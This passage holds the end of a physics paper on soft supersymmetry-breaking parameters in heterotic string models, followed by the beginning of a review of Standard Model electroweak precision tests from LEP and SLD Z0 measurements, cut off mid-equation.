&~& + \sum_{\lambda, \mu} ( s_{\lambda}^{\mu}(S + {\bar S}
+ \delta_{GS}^{A} V_A)
+ t_{\lambda}^{\mu}(T + {\bar T}) + u_{\lambda}^{{\mu}(S,T)} )
\phi^\lambda {\bar \phi}_\mu + \cdots
\label{K-st2}
\end{eqnarray}
where $K^{(S, T)}$ and $u_{\lambda}^{{\mu}(S,T)}$ are mixing terms between
$S$ and $T$.
The magnitudes of $\langle K^{(S, T)} \rangle$,
$\langle s_{\lambda}^{\mu} \rangle$ and
$\langle u_{\lambda}^{{\mu}(S,T)} \rangle$
are assumed to be $O(\epsilon_1 M^2)$, $O(\epsilon_2)$ and $(\epsilon_3)$
where $\epsilon_n$'s ($n=1,2,3$) are model-dependent parameters
whose orders are expected not to be more than one.\footnote{
The existence of $s_{\lambda}^{\mu} \phi^\lambda {\bar \phi}_\mu$
term in $K$
and its contribution to soft scalar masses are discussed in
4D effective theory derived through the standard embedding
from heterotic M-theory \cite{het/M}.}
We estimate the VEV of derivatives of $K$
in the form including $\epsilon_n$.
For example, $\langle K^\mu_{\lambda S} \rangle \leq O(\epsilon_p/M)$
($p=2,3$).
Our consideration is applicable to models in which some of $\phi^\lambda$
are composite fields made of original matter multiplets in string
models if the K\"ahler potential meets the above requirements.
Using the K\"ahler potential (\ref{K-st2}), $\hat{D}^A$ is given by
\begin{eqnarray}
\hat{D}^A &=& -K_S \delta_{GS}^{A} M
+ \sum_{\lambda, \mu} K_\lambda^\mu {\bar \phi}_\mu (q^A \phi)^\lambda
+ \cdots .
\label{D-st}
\end{eqnarray}
The breaking scale of $U(1)_A$ defined by
$M_I \equiv |\langle \phi^m \rangle|$ is estimated as
$M_I = O((\langle K_S \rangle \delta^A_{GS} M/q^A_m)^{1/2})$
from the requirement $\langle D^A \rangle \leq O(m_{3/2} M)$.
We require that $M_I$ should be equal to or be less than $M$,
and then we find that the VEV of $K_S$ has an upper bound such as
$\langle K_S \rangle \leq O(q^A_m M/\delta^A_{GS})$.
The $U(1)_A$ gauge boson mass squared $(M_{V}^{2})^A$ is given by
\begin{eqnarray}
(M_{V}^{2})^A = 2 g_A^2 \{ \langle K^S_S \rangle (\delta_{GS}^A M)^2
+ \sum_{m, n} q^A_m q^A_n
\langle K^{n}_{m} \rangle
\langle \phi^m \rangle \langle {\bar \phi}_n \rangle \}
\label{MV2A}
\end{eqnarray}
where $g_A$ is a $U(1)_A$ gauge coupling constant.
The magnitude of $(M_{V}^{2})^A/g_A^2$ is estimated as
$Max(O(\langle K^S_S \rangle (\delta^A_{GS} M)^2), O(q^{A2}_m M_I^2))$.
We assume that the magnitude of $(M_{V}^{2})^A/g_A^2$ is
$O(q^{A2}_m M_I^2)$.
It leads to the inequality
$\langle K^S_S \rangle \leq O((q^{A}_m M_I/\delta^{A}_{GS} M)^2)$.
The formula of soft SUSY breaking scalar masses on $G_{SM}$ non-singlet
fields is given by \cite{KK}
\begin{eqnarray}
(m^2)^k_l &=& (m_{3/2}^2 + {\langle V_F \rangle \over M^2})
\langle K^k_l \rangle
+ \langle {F}^{I} \rangle \langle {F}_{J} \rangle
(\langle R_{Il}^{Jk} \rangle + \langle X_{Il}^{Jk} \rangle) , \\
\langle R_{Il}^{Jk} \rangle &\equiv&
\langle ({K}_{Il}^{I'} (K^{-1})^{J'}_{I'}
{K}^{kJ}_{J'} - {K}_{Il}^{Jk}) \rangle , \\
\langle X_{Il}^{Jk} \rangle &\equiv&
q^A_k ((M^2_V)^A)^{-1} \langle ({\hat D}^A)_I^J \rangle
\langle K^k_l \rangle.
\end{eqnarray}
Here we neglect extra $F$-term contributions and so forth
since they are model-dependent.
The neglect of extra $F$-term contributions is justified
if Yukawa couplings between heavy and light fields
are small enough and the $R$-parity violation is also tiny enough.
We have used Eq.(\ref{<VI2>}) to derive the part related to
$D$-term contribution.
Note that the last term in r.h.s. of Eq.(\ref{<VI2>}) is negligible
when $(M_{V}^{2})^A/g_A^2$ is much bigger than $m_{3/2}^2$.
Using the above mass formula, the magnitudes of
$\langle R_{Il}^{Jk} \rangle$ and
$\langle X_{Il}^{Jk} \rangle$ are estimated and given in Table 1.
Here we assume $q^A_k/q^A_m = O(1)$.
\begin{table}
\caption{The magnitudes of $\langle R_{Il}^{Jk} \rangle$ and
$\langle X_{Il}^{Jk} \rangle$}
\begin{center}
\begin{tabular}{|c|l|l|}
\hline
$(I,J)$ & $\langle R_{Il}^{Jk} \rangle$ & $\langle X_{Il}^{Jk} \rangle$ \\
\hline\hline
$(S,S)$ & $O(\epsilon_p/M^2)$ &
$Max(O(\langle K^S_{SS} \rangle/\langle K_{S} \rangle),
O(\epsilon_p/M^2))$ \\ \hline
$(T,T)$ & $O(1/M^2)$
& $Max(O(\epsilon_1/(\langle K_{S} \rangle M)),
O(1/M^2))$ \\ \hline
$(m,m)$ & $O(1/M^2)$ & $O(1/M_I^2)$ \\ \hline
$(S,T)$ & $O(\epsilon_p/M^2)$
& $Max(O(\epsilon_1/(\langle K_{S} \rangle M)),
O(\epsilon_3/M^2))$ \\ \hline
$(S,m)$ & $O(\epsilon_p M_I/M^3)$
& $Max(O(\epsilon_p/(\langle K_{S} \rangle M)),
O(\epsilon_p/(M M_I))$ \\ \hline
$(T,m)$ & $O(M_I/M^3)$
& $Max(O(\epsilon_3/(\langle K_{S} \rangle M)),
O(1/(M M_I))$ \\ \hline
\end{tabular}
\end{center}
\end{table}
Now we obtain the following generic features on $(m^2)^k_l$.\\
(1) The order of magnitude of $\langle X_{Il}^{Jk} \rangle$ is
equal to or bigger than that of $\langle R_{Il}^{Jk} \rangle$
except for an off-diagonal part $(I,J)=(S,T)$.
Hence {\it the magnitude of $D$-term contribution is comparable to
or bigger than that of $F$-term contribution except for the universal part}
$(m_{3/2}^2 + \langle V_F \rangle/M^2)\langle K_l^k \rangle$.\\
(2) In case where the magnitude of $\langle F_m \rangle$ is bigger than
$O(m_{3/2} M_I)$ and $M > M_I$,
we get the inequality $(m^2_D)_k > O(m_{3/2}^2)$ since the magnitude of
$\langle \hat{D}^A \rangle$ is bigger than $O(m_{3/2}^2)$.\\
(3) In order to get the inequality $O((m^2_F)_k) > O((m^2_D)_k)$, the
following conditions must be satisfied simultaneously,
\begin{eqnarray}
&~& \langle F_T \rangle, \langle F_m \rangle \ll O(m_{3/2} M) ,~~
\langle F_S \rangle = O({m_{3/2} M \over \langle K^S_S \rangle^{1/2}})
\nonumber \\
&~& {M^2 \langle K^S_{SS} \rangle \over \langle K_S \rangle
\langle K^S_S \rangle} < O(1) ,~~
{\epsilon_p \over \langle K^S_S \rangle} < O(1) ,~~(p=2,3)
\label{conditions}
\end{eqnarray}
unless an accidental cancellation among
terms in $\langle \hat{D}^A \rangle$ happens.
To fulfill the condition $\langle F_{T,m} \rangle \ll O(m_{3/2} M)$,
a cancellation among various terms including $\langle K_{I} \rangle$ and
$\langle M^2 W_{I} / W \rangle$ is required.
Note that the magnitudes of
$\langle K_{T} \rangle$ and $\langle K_{m} \rangle$
are estimated as $O(M)$ and $O(M_I)$, respectively.
The gauge kinetic function is given by
\begin{eqnarray}
f_{\alpha\beta} = k_\alpha {S \over M}\delta_{\alpha\beta}
+ \epsilon_\alpha {T \over M}\delta_{\alpha\beta}
+ f_{\alpha\beta}^{(m)}(\phi^\lambda)
\label{f}
\end{eqnarray}
where $k_{\alpha}$'s are Kac-Moody levels
and $\epsilon_\alpha$ is a model-dependent parameter \cite{epsilon}.
The gauge coupling constants $g_\alpha$'s are related to the
real part of gauge kinetic functions such that
$g_\alpha^{-2} = \langle Re f_{\alpha\alpha} \rangle$.
The magnitudes of gaugino masses and $A$-parameters
in MSSM particles are estimated using the formulae
\begin{eqnarray}
M_a &=& \langle F^I \rangle \langle h_{aI} \rangle
\label{Ma2} ,\\
\langle h_{aI} \rangle &\equiv& \langle Re f_a \rangle^{-1}
\langle f_a,_I \rangle \\
A_{kll'} &=& \langle F^I \rangle \langle a_{kll'I} \rangle
\label{A2}, \\
\langle a_{kll'I} \rangle &\equiv& \langle f_{kll'},_I \rangle
+ {\langle K_I \rangle \over M^2} \langle f_{kll'} \rangle
- \langle K_{(kI}^{I'} \rangle \langle (K^{-1})_{I'}^J \rangle
\langle f_{Jll')} \rangle .
\end{eqnarray}
The result is given in Table 2.
Here we assume that $g_\alpha^{-2} = O(1)$.
\begin{table}
\caption{The magnitudes of $\langle h_{aI} \rangle$
and $\langle a_{kll'I} \rangle$}
\begin{center}
\begin{tabular}{|c|l|l|}
\hline
$I$ & $\langle h_{aI} \rangle$ & $\langle a_{kll'I} \rangle$
\\ \hline\hline
$S$ & $O(1/M)$ &
$Max(O(\langle K_{S} \rangle/M^2), O(\epsilon_p/M))$ \\ \hline
$T$ & $O(\epsilon_\alpha/M)$ & $O(1/M)$ \\ \hline
$m$ & $O(M_I/M^2)$ & $O(M_I/M^2)$ \\ \hline
\end{tabular}
\end{center}
\end{table}
In case that SUSY is broken by the mixture of $S$, $T$ and matter
$F$-components such that
$\langle (K^S_S)^{1/2} F_S \rangle$, $\langle F_T \rangle$,
$\langle F_m \rangle= O(m_{3/2} M)$ ,
we get the following relations among soft SUSY breaking parameters
\begin{eqnarray}
(m^2)_k &\geq& (m^2_D)_k = O(m_{3/2}^2 {M^2 \over M_I^2}) \geq
(A_{kll'})^2 = O(m_{3/2}^2) ,
\label{Mix-rel1}\\
(M_a)^2 &=& O(m_{3/2}^2) \cdot Max(O({\langle K^S_S \rangle}^{-1}),
O(\epsilon_\alpha^2), O({M_I^2 \over M^2})) .
\label{Mix-rel2}
\end{eqnarray}
Finally we discuss the three special cases of SUSY breaking scenario.
\begin{enumerate}
\item In the dilaton dominant SUSY breaking scenario
\begin{eqnarray}
\langle (K^S_S)^{1/2} F_S \rangle = O(m_{3/2} M) \gg
\langle F_T \rangle, \langle F_m \rangle ,
\label{S-dom}
\end{eqnarray}
the magnitudes of soft SUSY breaking parameters are estimated as
\begin{eqnarray}
(m^2)_k &=& O(m_{3/2}^2) \cdot Max(O(1), O({M^2 \langle K^S_{SS} \rangle
\over \langle K^S_S \rangle \langle K_S \rangle}),
O({\epsilon_p \over \langle K^S_S \rangle})) , \nonumber \\
M_a &=& O({m_{3/2} \over \langle K^S_S \rangle^{1/2}}) , ~~~
A_{kll'} = O(m_{3/2}) \cdot Max(O({\langle K_{S} \rangle \over M}),
O(\epsilon_p)) . \nonumber
\end{eqnarray}
Hence we have a relation such that $O((m^2)_k) \geq O((A_{kll'})^2)$.
As discussed in Ref.\cite{model-dep1}, gauginos can be heavier than
scalar fields if $\langle K^S_S \rangle$ is small enough and
$O(M^2 \langle K^S_{SS} \rangle) < O(\langle K_S \rangle)$.
In this case, dangerous flavor changing neutral current
(FCNC) effects from squark mass non-degeneracy are avoided
because the radiative correction
due to gauginos dominates in scalar masses at the weak scale.
On the other hand, in Ref.\cite{model-dep2},
it is shown that gauginos are much lighter than
scalar fields from the requirement of
the condition of vanishing vacuum energy
in the SUGRA version of model proposed in Ref.\cite{BD}.
In appendix, we discuss the relations among the magnitudes of
$\langle K_S \rangle$, $\langle K^S_S \rangle$ and
$\langle K^S_{SS} \rangle$ under some assumptions.
\item In the moduli dominant SUSY breaking scenario
\begin{eqnarray}
\langle F_T \rangle = O(m_{3/2} M) \gg
\langle (K^S_S)^{1/2} F_S \rangle, \langle F_m \rangle ,
\label{T-dom}
\end{eqnarray}
the magnitudes of soft SUSY breaking parameters are estimated as
\begin{eqnarray}
(m^2)_k &=& O(m_{3/2}^2) \cdot Max(O(1), O({\epsilon_1 M \over
\langle K_S \rangle})) ,\nonumber \\
M_a &=& O(\epsilon_\alpha m_{3/2}) , ~~~
A_{klm} = O(m_{3/2}) . \nonumber
\end{eqnarray}
Hence we have a relation such that
$O((m^2)_k) \geq O((A_{kll'})^2) \geq O((M_a)^2)$.
The magnitude of $\mu_{TT}$ is estimated as $\mu_{TT} = O(m_{3/2})$.
\item In the matter dominant SUSY breaking scenario
\begin{eqnarray}
\langle F_m \rangle = O(m_{3/2} M) \gg
\langle (K^S_S)^{1/2} F_S \rangle, \langle F_T \rangle ,
\label{matter-dom}
\end{eqnarray}
the magnitudes of soft SUSY breaking parameters are estimated as
\begin{eqnarray}
(m^2)_k &=& O(m_{3/2}^2 {M^2 \over M_I^2}) , ~~~
M_a, A_{kll'} = O(m_{3/2} {M_I \over M}) . \nonumber
\end{eqnarray}
The relation $(m^2)_k \gg O((M_a)^2) = O((A_{kll'})^2)$
is derived when $M \gg M_I$.
The magnitude of $\mu_{mn}$ is estimated as
$\mu_{mn} = O(m_{3/2} M/M_I)$.
This value is consistent with that in Ref.\cite{DP}.
\end{enumerate}
\section{Conclusions}
We have studied the magnitudes of soft SUSY breaking parameters
in heterotic string models with $G_{SM} \times U(1)_A$,
which originates from the breakdown of $E_8 \times E'_8$, and derive
model-independent predictions for them
without specifying SUSY breaking mechanism
and the dilaton VEV fixing mechanism.
In particular, we have made a comparison of magnitudes between
$D$-term contribution to scalar masses and $F$-term ones and
a comparison of magnitudes among scalar masses, gaugino masses
and $A$-parameters
under the condition that $O(m_{3/2}) \ll \langle K_S \rangle \leq
O(q^A_m M/\delta^A_{GS})$, $(M_V^2)^A/g_A^2 = O(q^{A2}_m M_I^2)$
and $\langle V \rangle \leq O(m_{3/2}^2 M^2)$.
The order of magnitude of $D$-term contribution of $U(1)_A$
to scalar masses is comparable to
or bigger than that of $F$-term contribution $\langle F^I \rangle
\langle F_J \rangle \langle R_{Il}^{Jk} \rangle$
except for the universal part
$(m_{3/2}^2 + \langle V_F \rangle/M^2)\langle K_l^k \rangle$.
If the magnitude of $F$-term condensation of matter fields
$\langle F_m \rangle$ is bigger than
$O(m_{3/2} M_I)$, the magnitude of $D$-term contribution $(m_D^2)_k$
is bigger than $O(m_{3/2}^2)$.
In general, it is difficult to realize the inequality
$O((m^2_D)_k) < O((m^2_F)_k)$ unless conditions such as
Eq.(\ref{conditions}) are fulfilled.
We have also discussed relations among soft SUSY breaking
parameters in three special scenarios on SUSY breaking,
i.e., dilaton dominant SUSY breaking scenario,
moduli dominant SUSY breaking scenario
and matter dominant SUSY breaking scenario.
The $D$-term contribution to scalar masses with different broken
charges as well as the $F$-term contribution from the difference among
modular weights can destroy universality among scalar masses.
The non-degeneracy among squark masses of first and second families
endangers the discussion of the suppression
of FCNC process.
On the other hand, the difference among broken charges
is crucial for the scenario of fermion mass hierarchy
generation \cite{texture}.
It seems to be difficult to make two discussions compatible.
There are several way outs.
The first one is to construct a model that the fermion mass hierarchy is
generated due to non-anomalous $U(1)$ symmetries.
In the model, $D$-term contributions of non-anomalous $U(1)$ symmetries
vanish in the dilaton dominant SUSY breaking case
and it is supposed that anomalies from contributions of
the MSSM matter fields are canceled out
by an addition of extra matter fields.
The second one is to use ``stringy'' symmetries
for fermion mass generation in the situation with degenerate
soft scalar masses \cite{texture2}.
The third one is to use a parameter region that
the radiative correction due to gauginos, which is flavor independent,
dominates in scalar masses
at the weak scale.
It can be realized when $\langle K^S_S \rangle$ is small enough and
$O(M^2 \langle K^S_{SS} \rangle) < O(\langle K_S \rangle)$.
Finally we give a comment on moduli problem \cite{cosmo}.
If the masses of dilaton or moduli fields are of order of the weak scale,
the standard nucleosynthesis should be modified
because of a huge amount of entropy production.
The dilaton field does not cause dangerous contributions
in the case with $\langle (K^S_S)^{1/2} F_S \rangle = O(m_{3/2} M)$
if the magnitude of $\langle K_S^S \rangle$
is small enough.\footnote{
This possibility has been pointed out
in the last reference in \cite{corr2}.}
Because the magnitudes of $(m_F^2)_S$ is
given by $O(m_{3/2}^2/\langle K_S^S \rangle^2)$.
\section*{Acknowledgements}
The author is grateful to T.~Kobayashi, H.~Nakano, H.P.~Nilles and
M.~Yamaguchi for useful discussions.
| 2024-02-18T23:40:13.831Z | 1998-11-19T06:07:10.000Z | algebraic_stack_train_0000 | 1,746 | 5,241 |
|
proofpile-arXiv_065-8538 | \section{\bf Introduction}
In the context of the Minimal Standard Model (MSM), any ElectroWeak (EW) process
can be computed at tree level from $\alpha$ (the fine structure constant
measured at values of $q^2$ close to zero), $\mathrm{M}_{\mathrm{W}}$~(the W-boson mass),
$\mathrm{M}_{\mathrm{Z}}$~(the Z-boson mass), and $\mathrm{V}_{\mathrm{jk}}$~(the
Cabbibo-Kobayashi-Maskawa flavour-mixing matrix elements).
When higher order corrections are included, any observable can be predicted in the
``on-shell'' renormalization scheme as a function of:
\noindent
\begin{eqnarray}
O_i & = & f_i(\alpha, \alpha_{\mathrm{s}},\mathrm{M}_{\mathrm{W}} ,\mathrm{M}_{\mathrm{Z}},
\mathrm{M}_{\mathrm{H}},\mathrm{m}_{\mathrm{f}},\rm{V}_{\rm{jk}}) \nonumber
\end{eqnarray}
\noindent and contrary to what happens with ``exact gauge symmetry theories'',
like QED or QCD, the effects of heavy particles do not decouple. Therefore, the
MSM predictions depend on the top mass
($\mathrm{m}^2_{\mathrm{t}}/\mathrm{M}^2_{\mathrm{Z}}$)
and to less extend to the Higgs mass
(log($\mathrm{M}^2_{\mathrm{H}}/\mathrm{M}^2_{\mathrm{Z}}$)),
or to any kind of ``heavy new physics''.
The subject of this letter is to show how the high precision achieved in the
EW measurements from $\mathrm{Z}^{0}$~physics allows to test the MSM beyond the tree level
predictions and, therefore, how this measurements are able to indirectly determine
the value of $\mathrm{m}_{\mathrm{t}}$~and $\mathrm{M}_{\mathrm{W}}$,
to constrain the unknown value of $\mathrm{M}_{\mathrm{H}}$, and at the same time to
test the consistency between measurements and theory. At present the uncertainties
in the theoretical predictions are dominated by the precision on the input
parameters.
\subsection{\bf Input Parameters of the MSM}\label{subsec:input_par}
The W mass is one of the input parameters in the ``on-shell'' renormalization scheme.
It is known with a precision of about 0.07\%, although the usual procedure is
to take $G_{\mu}$~(the Fermi constant measured in the muon decay)
to predict $\mathrm{M}_{\mathrm{W}}$~as a function of the rest of the input parameters
and use this more precise value.
Therefore, the input parameters are chosen to be:
\noindent
\begin{eqnarray}
\rm{Input~Parameter} & \rm{Value} & \rm{Relative~Uncertainty} \nonumber \\
\alpha^{-1}(\mathrm{M}^2_{\mathrm{Z}}) = & 128.896 (90) & 0.07 \% \nonumber \\
\alpha_{\mathrm{s}}(\mathrm{M}^2_{\mathrm{Z}}) = & 0.119 (2) & 1.7 \% \nonumber \\
G_{\mu} = & 1.16639 (2) \times 10^{-5}~\mathrm{GeV^{-2}} & 0.0017 \% \nonumber \\
\mathrm{M}_{\mathrm{Z}} = & 91.1867 (21)~\mathrm{GeV} & 0.0023 \% \nonumber \\
\mathrm{m}_{\mathrm{t}} = & 173.8 (50)~\mathrm{GeV} & 2.9 \% \nonumber \\
\mathrm{M}_{\mathrm{H}} > & 89.8~\mathrm{GeV}~@95\%~C.L. & \nonumber
\end{eqnarray}
Notice that the less well known parameters are $\mathrm{m}_{\mathrm{t}}$, $\alpha_{\mathrm{s}}$~and, of course,
the unknown value of $\mathrm{M}_{\mathrm{H}}$. The next less well known parameter is
$\alpha^{-1}(\mathrm{M}^2_{\mathrm{Z}})$, even though its value at
$q^2 \sim 0$ is known with an amazing relative precision of $4 \times 10^{-8}$,
($\alpha^{-1}(0)=137.0359895~(61)$).
The reason for this loss of precision when one computes the running of $\alpha$,
\noindent
\begin{eqnarray}
\alpha^{-1}(\mathrm{M}^2_{\mathrm{Z}}) & = & \frac{\alpha^{-1}(0)}{1-\Pi_{\gamma\gamma}} \nonumber
\end{eqnarray}
\noindent is the large contribution from the light fermion loops to the photon
vacuum polarisation, $\Pi_{\gamma\gamma}$.
The contribution from leptons and top quark loops is well calculated
but for the light quarks non-perturbative
QCD corrections are large at low energy scales. The method so far
has been to use the measurement of the hadronic cross section
through one-photon exchange, normalised to the point-like muon
cross-section, R(s), and evaluate the dispersion integral:
\noindent
\begin{eqnarray}
\Re(\Pi^{\mathrm{had}}_{\gamma\gamma}) & = & \frac{\alpha \mathrm{M}^2_{\mathrm{Z}}}{3 \pi} \Re
\left( \int \frac{R(s')}{s'(s'-\mathrm{M}^2_{\mathrm{Z}}+i\epsilon)} ds' \right)
\end{eqnarray}
\noindent giving~\cite{OLDALPHA} $\Pi_{\gamma\gamma} = - 0.0632 \pm 0.0007$, the error being
dominated by the experimental uncertainty in the cross section measurements.
Recently, several new {\em ``theory driven''} calculations~\cite{DAVIER}~\cite{NEWALPHA}
have reduced this error by a factor of about 4.5,
by extending the regime of applicability of Perturbative QCD (PQCD). This needs to
be confirmed using precision measurements of the hadronic cross section at
$\sqrt{s} \sim$~1~to~7~GeV. The very preliminary first results from
BESS II~\cite{BESS} seem to validate this procedure, being in agreement with
the predictions from PQCD.
\subsection{\bf What are we measuring to test the MSM?}\label{subsec:what_meas}
From the point of view of radiative corrections we can divide the $\mathrm{Z}^{0}$~measurements
into three different groups: the $\mathrm{Z}^{0}$~total and partial widths,
the partial width into b-quarks ($\Gamma_{\mathrm{b}}$), and the $\mathrm{Z}^{0}$~asymmetries ($\sin^2\theta_{\mathrm{eff}}$).
For instance,
the leptonic width ($\Gamma_{\mathrm{l}}$) is mostly sensitive to isospin-breaking loop corrections
($\Delta \rho$), the asymmetries are specially sensitive to radiative corrections to
the $\mathrm{Z}^{0}$~self-energy, and $\mathrm{R}_{\mathrm{b}}$~is mostly sensitive to vertex corrections in the decay
$\mathrm{Z} \rightarrow b \bar{b}$. One more parameter,
$\Delta r$, is necessary to describe the radiative corrections to the relation
between $G_{\mu}$~and $\mathrm{M}_{\mathrm{W}}$.
The sensitivity of these three $\mathrm{Z}^{0}$~observables and $\mathrm{M}_{\mathrm{W}}$~to the input parameters is shown in
table~\ref{tab:sensitiv}. The most sensitive observable to the unknown
value of $\mathrm{M}_{\mathrm{H}}$~are the $\mathrm{Z}^{0}$~asymmetries parametrised via $\sin^2\theta_{\mathrm{eff}}$. However also the sensitivity
of the rest of the observables is very relevant compared to the achieved experimental precision.
\begin{table}[t]
\caption{ Relative error in units of per-mil on the MSM predictions
induced by the uncertainties on the input parameters. The second column shows
the present experimental errors.\label{tab:sensitiv}}
\vspace{0.2cm}
\begin{center}
\footnotesize
\begin{tabular}{|l|c|c c c c|}
\hline
{} &\raisebox{0pt}[13pt][7pt]{Exp. error} &
\raisebox{0pt}[13pt][7pt]{$\Delta$$\mathrm{m}_{\mathrm{t}}$ = 5.0~GeV} & \raisebox{0pt}[13pt][7pt]{$\Delta$$\mathrm{M}_{\mathrm{H}}$ [90-1000]~GeV} &
\raisebox{0pt}[13pt][7pt]{$\Delta$$\alpha_{\mathrm{s}}$ = 0.002} & \raisebox{0pt}[13pt][7pt]{$\Delta\alpha^{-1}$ = 0.090} \\
\hline
$\Gamma_{\mathrm{Z}}$ & 1.0 & 0.5 & \bf{3.4} & 0.5 & 0.3 \\
$\mathrm{R}_{\mathrm{b}}$ & 3.4 & \bf{0.8} & 0.1 & - & - \\
$\mathrm{M}_{\mathrm{W}}$ & 0.7 & 0.4 & \bf{2.2} & - & 0.2 \\
$\sin^2\theta_{\mathrm{eff}}$ & 0.8 & 0.7 & \bf{5.8} & - & 1.0 \\
\hline
\end{tabular}
\end{center}
\end{table}
\section{\bf $\mathrm{Z}^{0}$~lineshape}
The shape of the resonance is completely characterised by three parameters: the position of the
peak ($\mathrm{M}_{\mathrm{Z}}$), the width ($\Gamma_{\mathrm{Z}}$) and the height ($\sigma^0_{\mathrm{f\bar{f}}}$) of the resonance:
\noindent
\begin{eqnarray}
\sigma^0_{\mathrm{f\bar{f}}} & = & \frac{12\pi}{\mathrm{M}^2_{\mathrm{Z}}}
\frac{\Gamma_{\mathrm_{e}}\Gamma_{\mathrm_{f}}}{\Gamma^2_{\mathrm_{Z}}}
\end{eqnarray}
The good capabilities
of the LEP detectors to identify the lepton flavours allow to measure the ratio of
the different lepton species with respect to the hadronic cross-section,
$\mathrm{R}_{\mathrm{l}}$ = $\frac{\Gamma_{\mathrm{h}}}{\Gamma_{\mathrm{l}}}$.
About 16~million $\mathrm{Z}^{0}$~decays have been analysed by the four LEP collaborations,
leading to a statistical precision on $\sigma^0_{\mathrm{f\bar{f}}}$ of 0.03 \% ! Therefore,
the statistical error is not the limiting factor, but more the experimental systematic
and theoretical uncertainties.
The error on the measurement of $\mathrm{M}_{\mathrm{Z}}$~is dominated by the uncertainty on the absolute
scale of the LEP energy measurement (about 1.7~MeV),
while in the case of $\Gamma_{\mathrm{Z}}$~it is the point-to-point
energy and luminosity errors which matter (about 1.3~MeV). The error on $\sigma^0_{\mathrm{f\bar{f}}}$ is
dominated by the theoretical uncertainty on the small angle bhabha calculations
(0.11 \%), but this is going to improve very soon with the new estimation
of this uncertainty (0.06 \%) shown at this workshop~\cite{WARD}. Moreover, a QED
uncertainty estimated to be around 0.05 \% has also been included in the fits.
The results of the lineshape fit are shown in table~\ref{tab:lineshape} with and
without the hypothesis of lepton universality. From them, the leptonic widths
and the invisible $\mathrm{Z}^{0}$~width are derived.
\begin{table}[t]
\caption{Average line shape parameters from the results of the four LEP experiments.
\label{tab:lineshape}}
\vspace{0.2cm}
\begin{center}
\footnotesize
\begin{tabular}{|l|c|c|}
\hline
\raisebox{0pt}[13pt][7pt]{Parameter} &
\raisebox{0pt}[13pt][7pt]{Fitted Value} &
\raisebox{0pt}[13pt][7pt]{Derived Parameters} \\
\hline
$\mathrm{M}_{\mathrm{Z}}$ & 91186.7 $\pm$ 2.1~MeV & \\
$\Gamma_{\mathrm{Z}}$ & 2493.9 $\pm$ 2.4~MeV & \\
$\sigma^0_{\mathrm{had}}$ & 41.491 $\pm$ 0.058~nb & \\
$\mathrm{R}_{\mathrm{e}}$ & 20.783 $\pm$ 0.052 & $\Gamma_{\mathrm{e}}$ = 83.87 $\pm$ 0.14~MeV \\
$\mathrm{R}_{\mu}$ & 20.789 $\pm$ 0.034 & $\Gamma_{\mu}$ = 83.84 $\pm$ 0.18~MeV \\
$\mathrm{R}_{\tau}$ & 20.764 $\pm$ 0.045 & $\Gamma_{\tau}$ = 83.94 $\pm$ 0.22~MeV \\
\hline
\multicolumn{3}{|c|}{\raisebox{0pt}[12pt][6pt]{With Lepton Universality}} \\
\hline
& & $\Gamma_{\mathrm{had}}$= 1742.3 $\pm$ 2.3~MeV \\
$\mathrm{R}_{\mathrm{l}}$ & 20.765 $\pm$ 0.026 & $\Gamma_{\mathrm{l}}$ = 83.90 $\pm$ 0.10~MeV \\
& & $\Gamma_{\mathrm{inv}}$= 500.1 $\pm$ 1.9~MeV \\
\hline
\end{tabular}
\end{center}
\end{table}
From the measurement of the $\mathrm{Z}^{0}$~invisible width, and assuming the ratio of the partial widths to
neutrinos and leptons to be the MSM predictions
($\frac{\Gamma_{\nu}}{\Gamma_{\mathrm{l}}} = 1.991 \pm 0.001 $), the number of light neutrinos
species is measured to be
\noindent
\begin{eqnarray}
\mathrm{N}_{\nu} & = & 2.994 \pm 0.011. \nonumber
\end{eqnarray}
Alternatively, one can assume three neutrino species and determine the width from additional
invisible decays of the $\mathrm{Z}^{0}$~to be $\Delta\Gamma_{\mathrm{inv}}<2.8$~MeV~@95\%~C.L.
The measurement of $\mathrm{R}_{\mathrm{l}}$~is very sensitive to PQCD corrections, thus it can be used to determine
the value of $\alpha_{\mathrm{s}}$. A combined fit to the measurements shown in table~\ref{tab:lineshape}, and
imposing $\mathrm{m}_{\mathrm{t}}$=173.8$\pm$5.0~GeV as a constraint gives:
\noindent
\begin{eqnarray}
\alpha_{\mathrm{s}}(\mathrm{M}^2_{\mathrm{Z}}) & = & 0.123 \pm 0.004 \nonumber
\end{eqnarray}
\noindent in agreement with the world average~\cite{ALPHAS}
$\alpha_{\mathrm{s}}(\mathrm{M}^2_{\mathrm{Z}}) = 0.119 \pm 0.002$.
\subsection{\bf Heavy flavour results}\label{subsec:HF}
The large mass and long lifetime of the $b$ and $c$ quarks provides a way to perform flavour tagging.
This allows for precise measurements of the partial widths of the decays $\mathrm{Z}^{0}$$\rightarrow c \bar{c}$ and
$\mathrm{Z}^{0}$$\rightarrow b \bar{b}$. It is useful to normalise the partial width to $\Gamma_{\mathrm{h}}$~by
measuring the partial decay fractions with respect to all hadronic decays
\noindent
\begin{eqnarray}
\mathrm{R}_{\mathrm{c}} \equiv \frac{\Gamma_{c}}{\Gamma_{\mathrm{h}}} & , &
\mathrm{R}_{\mathrm{b}} \equiv \frac{\Gamma_{b}}{\Gamma_{\mathrm{h}}}. \nonumber
\end{eqnarray}
With this definition most of the radiative corrections appear both in the numerator
and denominator and thus cancel out, with the important exception of the vertex corrections
in the $\mathrm{Z}^{0}$ $b\bar{b}$ vertex. This is the only relevant correction to $\mathrm{R}_{\mathrm{b}}$, and within the
MSM basically depends on a single parameter, the mass of the top quark.
The partial decay fractions of the $\mathrm{Z}^{0}$~to other quark flavours, like $\mathrm{R}_{\mathrm{c}}$, are only weakly
dependent on $\mathrm{m}_{\mathrm{t}}$; the residual weak dependence is indeed due to the presence of
$\Gamma_{b}$ in the denominator. The MSM predicts $\mathrm{R}_{\mathrm{c}}$ = 0.172, valid over a wide
range of the input parameters.
The combined values from the measurements of LEP and SLD gives
\noindent
\begin{eqnarray}
\mathrm{R}_{\mathrm{b}} & = & 0.21656 \pm 0.00074 \nonumber \\
\mathrm{R}_{\mathrm{c}} & = & 0.1735 \pm 0.0044 \nonumber
\end{eqnarray}
\noindent with a correlation of -17\% between the two values.
\section{\bf $\mathrm{Z}^{0}$~asymmetries: $\boldmath{\sin^2\theta_{\mathrm{eff}}}$ }
Parity violation in the weak neutral current is caused by the difference of couplings
of the $\mathrm{Z}^{0}$~to right-handed and left-handed fermions. If we define $A_{\mathrm{f}}$ as
\noindent
\begin{eqnarray}
A_{\mathrm{f}} & \equiv &
